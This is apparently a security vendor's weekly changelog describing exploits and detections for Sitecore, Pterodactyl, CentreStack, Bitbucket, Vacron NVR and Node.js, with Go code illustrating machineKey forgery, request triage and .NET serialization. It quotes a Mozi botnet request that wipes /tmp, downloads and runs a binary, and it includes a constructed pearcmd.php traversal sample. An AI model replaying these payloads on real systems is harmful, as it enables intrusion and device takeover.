We’re Gonna Need Pagination for This Changelog

Happy Friday! It’s been a busy week for the VulnCheck Initial Access team: we wrote coverage for six new vulnerabilities and cut a fresh release of go-exploit. VulnCheck will observe the July 4th holiday next Friday, so we’ll skip release notes next week and return to our regular schedule on July 11. Here’s a rundown of the team’s work from this week:

CVE-2025-34509: Sitecore Hardcoded Credential

Sitecore, already represented in VulnCheck KEV with three CVEs, was recently the subject of watchTowr research. The Initial Access team developed an exploit for the first link in watchTowr's exploit chain, a hardcoded account. That sounds simple, but it's surprisingly complicated.

Our exploit authenticates with the hardcoded credential and accesses sensitive data to help validate successful exploitation. The team additionally developed a version scanner, Snort and Suricata rules, PCAPs, and search queries.

CVE-2025-49132: Pterodactyl Panel Remote Code Execution

The team investigated a recently exploited vulnerability in Pterodactyl. Billed as pre-auth RCE, CVE-2025-49132 appeared at first to be a path traversal leading to arbitrary file disclosure. Further analysis revealed local file inclusion (LFI) in the Laravel PHP framework, a dependency for Pterodactyl. Leveraging pearcmd.php on the system, the team was able to reproduce RCE by writing PHP code to a file and then including the file.

With tens of thousands of potential targets online, we expect this new vulnerability to see increased exploitation very soon. Included in this release are an exploit with target validator, a packet capture of successful exploitation, Suricata and Snort signatures, and search queries for targets and signs of exploitation.

CVE-2025-30406: Gladinet CentreStack Deserialization via Hardcoded MachineKey

The team added an exploit for vulnerable versions of CentreStack, a cloud storage solution. This vulnerability has been reported as exploited in the wild by Huntress, CISA, and Gladinet.

The exploit we developed creates a serialized .NET object payload and signs it with the known machineKey, so the server trusts the payload and deserializes it. By default the exploit yields an asynchronous HTTP reverse shell executed via cscript on the target host. This can be overridden with the -command flag to run an arbitrary command, such as cmd.exe /c <some command>, under the privileges of the CentreStack application. On our default install, that account was iis apppool\portal, which holds SeImpersonatePrivilege.
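To make the trust problem concrete, the following Go program is an added illustration, not VulnCheck's exploit or Gladinet's code. It pulls a static validationKey out of a constructed web.config fragment (the key values are made up), signs an arbitrary blob with HMAC-SHA256 the way a MAC-protected state field is signed, and shows that the server-side verify accepts the blob with the shipped key but rejects it once the key is generated per install. ASP.NET's real scheme adds key derivation and a per-page modifier, which this model omits; the payload bytes stand in for a serialized object and are not a gadget.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/hex"
	"encoding/xml"
	"errors"
	"fmt"
	"strings"
)

// Constructed web.config fragment with a static <machineKey>, the shape of
// configuration this bug class depends on. The hex values are made up.
const sampleWebConfig = `<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="00112233445566778899AABBCCDDEEFF00112233445566778899AABBCCDDEEFF"
                decryptionKey="FFEEDDCCBBAA99887766554433221100FFEEDDCCBBAA99887766554433221100"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>`

type machineKey struct {
	ValidationKey string `xml:"validationKey,attr"`
	DecryptionKey string `xml:"decryptionKey,attr"`
	Validation    string `xml:"validation,attr"`
}

type webConfig struct {
	MachineKey machineKey `xml:"system.web>machineKey"`
}

// ParseMachineKey returns the validationKey bytes from a web.config, or an
// error when the key is auto-generated (the safe setting) or absent.
func ParseMachineKey(cfg string) ([]byte, error) {
	var wc webConfig
	if err := xml.Unmarshal([]byte(cfg), &wc); err != nil {
		return nil, err
	}
	vk := wc.MachineKey.ValidationKey
	if vk == "" || strings.HasPrefix(vk, "AutoGenerate") {
		return nil, errors.New("validationKey is auto-generated or absent: nothing to forge with")
	}
	return hex.DecodeString(vk)
}

// Sign models a MAC-protected state blob: base64(payload || HMAC-SHA256(key, payload)).
// Simplified on purpose: ASP.NET derives a sub-key and mixes in a per-page modifier.
func Sign(key, payload []byte) string {
	m := hmac.New(sha256.New, key)
	m.Write(payload)
	return base64.StdEncoding.EncodeToString(append(append([]byte{}, payload...), m.Sum(nil)...))
}

// Verify is the server side: the payload only reaches the deserializer if the
// MAC matches. With a key shipped in the product, passing this check says
// nothing about who built the payload.
func Verify(key []byte, blob string) ([]byte, bool) {
	raw, err := base64.StdEncoding.DecodeString(blob)
	if err != nil || len(raw) < sha256.Size {
		return nil, false
	}
	payload, tag := raw[:len(raw)-sha256.Size], raw[len(raw)-sha256.Size:]
	m := hmac.New(sha256.New, key)
	m.Write(payload)
	if !hmac.Equal(tag, m.Sum(nil)) {
		return nil, false
	}
	return payload, true
}

// FreshKey is what AutoGenerate gives you: a random per-machine key that an
// attacker cannot read out of the vendor's shipped configuration.
func FreshKey() []byte {
	k := make([]byte, 64)
	if _, err := rand.Read(k); err != nil {
		panic(err)
	}
	return k
}

func main() {
	key, err := ParseMachineKey(sampleWebConfig)
	if err != nil {
		panic(err)
	}
	payload := []byte("serialized-object-placeholder") // stands in for a .NET gadget
	forged := Sign(key, payload)
	_, ok := Verify(key, forged)
	fmt.Println("server with shipped key accepts attacker blob:", ok)
	_, ok = Verify(FreshKey(), forged)
	fmt.Println("server with its own key accepts attacker blob:", ok)
}
```

The check a defender wants is the one in ParseMachineKey: a validationKey that is not AutoGenerate and is identical across installs is the entire precondition, and rotating it per deployment is what turns the second Verify call false.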

The team also delivered unencrypted and encrypted PCAPs, search engine queries, and network rules.

CVE-2022-36804: Atlassian Bitbucket Git Archive Command Injection

This week, the team added coverage for a historical CISA KEV entry affecting Atlassian Bitbucket Server and Data Center. With hundreds of Bitbucket hosts still online and at least one exploitation attempt observed in the last 90 days, this vulnerability is still one that attackers will take a chance on.

The exploit, supporting both unauthenticated and authenticated exploitation, leverages a command injection vulnerability within Bitbucket's repository archive creation functionality to deploy a reverse shell on a vulnerable target. In addition to the exploit, coverage includes Snort and Suricata rules, a PCAP demonstrating the exploit at work, and search queries.

CVE-2025-34043: Vacron NVR RCE

The VulnCheck CNA team recently assigned CVE-2025-34043 to a vulnerability that has been exploited in the wild since the days of IoT Reaper. Attackers are still actively targeting it: our friends at GreyNoise have seen 9,000+ attempts over the last 90 days, and DShield has seen the Mozi botnet attempting to exploit it as recently as yesterday (June 26). However, a quick analysis of the vulnerability shows the Mozi request shouldn't work, as it doesn't contain any of the commands that trigger exploitation:

/board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://redacted:37628/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron

The VulnCheck team developed an exploit that drops a web shell on the target and bypasses both Emerging Threats signatures currently available. We also created a PCAP, Snort/Suricata rules, and search engine queries to support detection and hunting efforts. Perhaps surprisingly, we found vulnerable targets exposed on the internet. Despite its age, this remains a viable attack vector for adversaries.
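As an added example, not VulnCheck's code or its Snort/Suricata rules, here is a small Go request triage routine that covers both the Pterodactyl pearcmd.php file inclusion described earlier and the Vacron board.cgi injection above. It decodes a request the way a CGI target would ('+' as space, percent-decoding, a second pass for double encoding), flags traversal or pearcmd.php references, and for board.cgi lists the chained commands in the cmd parameter so an analyst can compare them with what actually triggers the bug. The 'config-create' token (pearcmd's file-writing subcommand) and the 'file' parameter name in the constructed sample are assumptions; the page names neither.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// Finding is one suspicious request line and the reason it was flagged.
type Finding struct {
	Line   string
	Reason string
}

// decode undoes the encoding a CGI target undoes: percent sequences and '+'
// as space (how the board.cgi request carries its spaces). A second pass
// catches double-encoded traversal such as "%252e%252e".
func decode(s string) string {
	for i := 0; i < 2; i++ {
		d, err := url.QueryUnescape(s)
		if err != nil || d == s {
			break
		}
		s = d
	}
	return s
}

// queryParam reads one parameter by hand. url.Values would silently drop any
// pair containing ';' (Go 1.17+), which is exactly the byte we want to see.
func queryParam(rawQuery, name string) (string, bool) {
	for _, kv := range strings.Split(rawQuery, "&") {
		if strings.HasPrefix(kv, name+"=") {
			return decode(strings.TrimPrefix(kv, name+"=")), true
		}
	}
	return "", false
}

// shellMeta are the bytes that chain or substitute commands in a POSIX shell.
var shellMeta = []string{";", "|", "&", "`", "$(", "\n"}

// Triage inspects one request line ("METHOD /path?query HTTP/x") and returns
// zero or more findings. The heuristics are illustrative, not VulnCheck's.
func Triage(line string) []Finding {
	fields := strings.Fields(line)
	if len(fields) < 2 {
		return nil
	}
	u, err := url.Parse(fields[1])
	if err != nil {
		return nil
	}
	p := strings.ToLower(decode(u.Path))
	q := strings.ToLower(decode(u.RawQuery))
	var out []Finding

	// Laravel/Pterodactyl-style LFI: traversal, a direct reference to
	// pearcmd.php, or pearcmd's config-create subcommand (assumed here to be
	// the file-write step; the page does not name it).
	if strings.Contains(p+"?"+q, "../") || strings.Contains(q, "pearcmd.php") || strings.Contains(q, "config-create") {
		out = append(out, Finding{line, "LFI / pearcmd.php file-write attempt"})
	}

	// Vacron board.cgi: a cmd parameter that chains commands. Splitting on ';'
	// shows what the sender actually asked the device to run.
	if strings.HasSuffix(p, "/board.cgi") {
		if cmd, ok := queryParam(u.RawQuery, "cmd"); ok {
			for _, m := range shellMeta {
				if strings.Contains(cmd, m) {
					parts := strings.Split(cmd, ";")
					for i := range parts {
						parts[i] = strings.TrimSpace(parts[i])
					}
					out = append(out, Finding{line, fmt.Sprintf("board.cgi command injection: %d chained commands %q", len(parts), parts)})
					break
				}
			}
		}
	}
	return out
}

func main() {
	// Constructed sample log lines. The first is the Mozi request quoted above;
	// the "file" parameter in the second is a hypothetical name.
	lines := []string{
		"GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://redacted:37628/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron HTTP/1.1",
		"GET /?file=..%2F..%2Fusr%2Flocal%2Flib%2Fphp%2Fpearcmd.php&+config-create+%2F HTTP/1.1",
		"GET /api/client HTTP/1.1",
	}
	for _, l := range lines {
		for _, f := range Triage(l) {
			fmt.Println(f.Reason)
		}
	}
}
```

Run against the Mozi line it reports five chained commands (cd, rm, wget, chmod, execute), none of which is the board.cgi functionality the real exploit has to reach, which is the mismatch the paragraph above points out.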

VC-2025-1: Node.js File Write to libuv Signal Event Pipe Privilege Escalation

On request, the team looked into this privilege escalation vulnerability in Node.js. It was reported to the Node.js team, who classified it as informational and will not fix it; as such, it appears to still be present in current releases. Node.js is a very popular JavaScript runtime, and this vulnerability only requires Node to be installed.

The exploit works by writing a specially crafted message into an event pipe that Node.js (through libuv) creates and listens on. When the message carries a handle pointer at the expected offset, the event loop dereferences that pointer and calls through the handle. The exploit includes a helper shell script that can be run on the target to calculate the important offsets, improving reliability and repeatability across different Node.js versions.

go-exploit 1.45.0 Release

This week, the team started the process of adding native .NET serialized object generation into the open-sourced framework used to generate all of our exploits. This ongoing effort will add consistency and reliability to our exploits by reducing the use of pasted-in or modified binary blobs and will speed up development time. This will also give the security community at large another option for direct .NET serialized object payload integration into PoCs made using go-exploit or stand-alone PoCs written in Go.
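To show what "native .NET serialized object generation" involves at the byte level, here is an added Go example that is not go-exploit's API or code: it emits the simplest MS-NRBF (BinaryFormatter) stream by hand, a lone string root made of SerializationHeaderRecord, BinaryObjectString and MessageEnd records, and parses it back with record checks. Gadget chains are class records rather than a string, but the record framing, little-endian IDs and 7-bit length prefixes are the same machinery.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"encoding/hex"
	"errors"
	"fmt"
	"io"
)

// MS-NRBF RecordTypeEnum values used here ([MS-NRBF] 2.1.2.1).
const (
	recSerializationHeader = 0x00
	recBinaryObjectString  = 0x06
	recMessageEnd          = 0x0B
)

// writeLengthPrefixedString encodes a .NET LengthPrefixedString: a 7-bit
// variable-length byte count (low 7 bits first, high bit = more) then UTF-8.
func writeLengthPrefixedString(w *bytes.Buffer, s string) {
	n := len(s)
	for n >= 0x80 {
		w.WriteByte(byte(n&0x7F) | 0x80)
		n >>= 7
	}
	w.WriteByte(byte(n))
	w.WriteString(s)
}

// EncodeRootString produces the BinaryFormatter stream for a string root:
// header (RootId 1, HeaderId -1, version 1.0), one BinaryObjectString with
// ObjectId 1, then MessageEnd.
func EncodeRootString(s string) []byte {
	var b bytes.Buffer
	b.WriteByte(recSerializationHeader)
	binary.Write(&b, binary.LittleEndian, int32(1))  // RootId
	binary.Write(&b, binary.LittleEndian, int32(-1)) // HeaderId (none)
	binary.Write(&b, binary.LittleEndian, int32(1))  // MajorVersion
	binary.Write(&b, binary.LittleEndian, int32(0))  // MinorVersion
	b.WriteByte(recBinaryObjectString)
	binary.Write(&b, binary.LittleEndian, int32(1)) // ObjectId == RootId
	writeLengthPrefixedString(&b, s)
	b.WriteByte(recMessageEnd)
	return b.Bytes()
}

// DecodeRootString parses what EncodeRootString produced, rejecting streams
// whose header, root record or terminator do not line up.
func DecodeRootString(data []byte) (string, error) {
	r := bytes.NewReader(data)
	var hdr struct {
		Rec          byte
		RootID       int32
		HdrID        int32
		Major, Minor int32
	}
	if err := binary.Read(r, binary.LittleEndian, &hdr); err != nil {
		return "", err
	}
	if hdr.Rec != recSerializationHeader || hdr.Major != 1 || hdr.Minor != 0 {
		return "", errors.New("bad SerializationHeaderRecord")
	}
	var rec struct {
		Rec      byte
		ObjectID int32
	}
	if err := binary.Read(r, binary.LittleEndian, &rec); err != nil {
		return "", err
	}
	if rec.Rec != recBinaryObjectString || rec.ObjectID != hdr.RootID {
		return "", errors.New("root object is not a BinaryObjectString")
	}
	n, shift := 0, 0 // 7-bit length prefix
	for {
		c, err := r.ReadByte()
		if err != nil {
			return "", err
		}
		n |= int(c&0x7F) << shift
		if c&0x80 == 0 {
			break
		}
		if shift += 7; shift > 28 {
			return "", errors.New("length prefix too long")
		}
	}
	buf := make([]byte, n)
	if _, err := io.ReadFull(r, buf); err != nil {
		return "", err
	}
	end, err := r.ReadByte()
	if err != nil || end != recMessageEnd || r.Len() != 0 {
		return "", errors.New("missing or misplaced MessageEnd")
	}
	return string(buf), nil
}

func main() {
	blob := EncodeRootString("hello")
	fmt.Println(hex.EncodeToString(blob))
	s, err := DecodeRootString(blob)
	fmt.Println(s, err)
}
```

Building records this way is what lets a framework emit a payload from typed Go values instead of splicing bytes into a captured blob, and the decoder doubles as a sanity check that the emitted stream is well-formed before it is sent.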